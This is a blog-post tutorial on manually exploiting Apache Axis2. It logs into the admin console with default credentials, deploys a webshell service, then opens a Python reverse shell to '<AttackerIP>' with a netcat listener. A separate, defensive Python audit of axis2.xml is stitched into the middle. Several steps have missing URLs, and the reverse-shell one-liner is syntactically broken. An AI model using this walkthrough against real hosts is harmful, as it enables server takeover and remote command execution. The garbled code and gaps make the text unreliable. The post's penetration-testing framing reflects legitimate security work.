Thursday, March 9, 2017

Manually Exploiting Apache Axis2


I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.


For this exploit to work you must have:
  1. Valid admin console credentials
    • Default = admin:axis2
  2. Public access to the admin console


I have found that Nmap and OpenVAS have good modules to help us find the credentials for it.


$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2



  • There is a Metasploit module at "exploit/multi/http/axis2_deployer".
  • The code can be found on GitHub.
  • I have tried this exploit multiple times with no success.


  1. Navigating to will allow us to get the credentials. They should look like this:
     <parameter name="userName">admin</parameter>
     <parameter name="password">axis2</parameter>
  2. When you navigate to it should give you the login portal.
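Those two parameter lines are the admin console credentials in Axis2's axis2.xml, which is the file a defender should check before an attacker does. As an added example (not from the original post), the following Python audit parses that file and flags default or weak admin credentials; the file locations (conf/axis2.xml in the standalone distribution, WEB-INF/conf/axis2.xml in the WAR), the sample fragments and the hardened values are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed fragment of an Axis2 axis2.xml (conf/axis2.xml standalone,
# WEB-INF/conf/axis2.xml in the WAR; both paths are assumptions).
# Only the parameters relevant to the admin console are included.
DEFAULT_AXIS2_XML = """<axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
</axisconfig>
"""

# Same fragment after the operator changed the credentials (constructed values).
HARDENED_AXIS2_XML = DEFAULT_AXIS2_XML.replace(
    ">admin<", ">svc-axis-operator<").replace(">axis2<", ">Xk9!pQ2r#vL7mZ4w<")

DEFAULT_USERNAME = "admin"
DEFAULT_PASSWORD = "axis2"
MIN_PASSWORD_LENGTH = 12


def admin_credentials(xml_text):
    """Return (userName, password) from the top-level <parameter> elements; None if missing."""
    root = ET.fromstring(xml_text)
    params = {}
    for p in root.findall("parameter"):
        if p.get("name") in ("userName", "password"):
            params[p.get("name")] = (p.text or "").strip()
    return params.get("userName"), params.get("password")


def audit_admin_credentials(xml_text):
    """Return a list of findings; an empty list means nothing was flagged."""
    username, password = admin_credentials(xml_text)
    findings = []
    if username is None or password is None:
        findings.append("userName/password parameters not found; inspect the file manually")
        return findings
    if password == DEFAULT_PASSWORD:
        who = "credentials admin:axis2" if username == DEFAULT_USERNAME else "password 'axis2'"
        findings.append("admin console still uses the default " + who)
    elif not password:
        findings.append("admin password is empty")
    elif len(password) < MIN_PASSWORD_LENGTH:
        findings.append("admin password is shorter than %d characters" % MIN_PASSWORD_LENGTH)
    return findings


if __name__ == "__main__":
    for label, text in (("default", DEFAULT_AXIS2_XML), ("hardened", HARDENED_AXIS2_XML)):
        print(label, audit_admin_credentials(text) or ["no findings"])
```

Run it against the real axis2.xml by reading the file into a string; a non-empty result means the console is exploitable exactly as the rest of this post describes.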

Create the Payload

A simple Axis2 webshell can be found at
  1. Download the file
  2. Compile the file
    • Modify $JAVA_HOME if necessary
    • "ant -v" to build


  1. Upload the AxisInvoker.aar service.
  2. Verify the deployment by checking the Deactivate or Activate service tab.
  3. Verify the shell works by running
  4. Since stable shells are superior to web shells, we will upgrade to a stable shell. You will need to find out which scripting languages are installed on the system, or use a native option (like nc).
    • Get a reverse shell and modify it to point at your host machine.
      • I usually get most of my shells from PentestMonkey
      • import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<AttackerIP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);["/bin/sh","-i"]);
    • Download your reverse shell from your webserver to the victim machine.
    • Listen for the reverse shell by running "nc -nlvp 443".
    • Execute your shell on the victim machine.
    • After a few seconds, you should have a shell on your listener!

Hope that helps in your future pentests!